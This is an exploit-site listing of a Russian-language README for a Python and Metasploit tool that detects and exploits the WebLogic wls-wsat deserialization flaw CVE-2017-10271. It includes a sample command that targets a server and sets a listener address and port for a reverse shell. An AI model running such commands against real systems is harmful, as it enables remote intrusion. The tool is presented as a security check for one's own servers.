Sploitus

Exploit for CVE-2017-10271

kitploit · 2026-08-26

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KKIRSCHE-CVE-2017-10271
# CVE-2017-10271

Скрипт обнаружения и эксплуатации уязвимости десериализации компонента Weblogic wls-wsat (CVE-2017-10271)

### Использование

root@kitploit:~
    
    
    $ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/
    

### Возможности

  * Автономный скрипт на Python 
    * Функция проверки, уязвим ли хост
    * Функция эксплуатации для целей под Linux
  * Модуль Metasploit 
    * Функция проверки, уязвим ли хост
    * Функция эксплуатации для всех целей
  * Сканер (./scanners) 
    * Проверяет, уязвимы ли хосты. Полностью автономный



## Правовое уведомление

Вы несете ответственность за использование этого скрипта. Kevin Kirsche не несет никакой ответственности за любые действия, предпринятые с использованием кода, представленного здесь. Код создан для команд, желающих проверить безопасность своих серверов, а не для злонамеренного использования.

## Благодарности

Огромное спасибо Luffin за создание исходного POC, на котором основан этот скрипт: https://github.com/Luffin/CVE-2017-10271